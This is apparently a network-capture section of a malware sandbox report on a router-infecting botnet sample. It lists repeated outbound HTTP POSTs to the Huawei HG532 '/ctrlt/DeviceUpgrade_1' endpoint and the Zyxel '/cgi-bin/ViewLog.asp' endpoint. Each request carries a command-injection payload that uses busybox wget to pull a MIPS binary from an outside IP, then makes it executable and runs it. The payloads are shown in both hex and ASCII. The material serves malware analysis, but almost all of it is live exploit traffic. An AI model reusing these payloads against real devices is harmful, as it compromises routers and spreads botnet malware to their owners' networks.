                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:09.510603905 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:18.982491970 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:37.926465034 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:16.838521004 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              209192.168.2.133447895.86.126.258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:01.111855984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              210192.168.2.133649894.131.11.1958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:01.292458057 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              211192.168.2.133856231.136.150.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:01.297252893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.862576962 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.014563084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.414551973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:10.022615910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.238507032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.926443100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.790352106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              212192.168.2.133499685.214.214.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.099838972 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:02.325082064 CET552INHTTP/1.1 401
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 0
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              X-Frame-Options: DENY
                                              Content-Length: 193
                                              Date: Thu, 23 Nov 2023 04:16:02 GMT
                                              Keep-Alive: timeout=60
                                              Connection: keep-alive
                                              Data Raw: 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 20 50 6c 65 61 73 65 20 70 72 6f 76 69 64 65 20 61 20 58 2d 41 50 49 2d 4b 45 59 20 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 2e 0a 54 68 69 73 20 69 73 20 66 6f 75 6e 64 20 69 6e 20 53 65 74 74 69 6e 67 73 20 2d 3e 20 41 63 63 6f 75 6e 74 20 53 65 74 74 69 6e 67 73 20 2d 3e 20 41 50 49 20 4b 65 79 0a 41 6c 74 65 72 6e 61 74 69 76 6c 79 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 69 66 20 74 68 69 73 20 69 73 20 75 6e 65 78 70 65 63 74 65 64
                                              Data Ascii: Authentication required. Please provide a X-API-KEY in request header.This is found in Settings -> Account Settings -> API KeyAlternativly you can disable authentication if this is unexpected


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              213192.168.2.135318062.29.84.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:02.117760897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
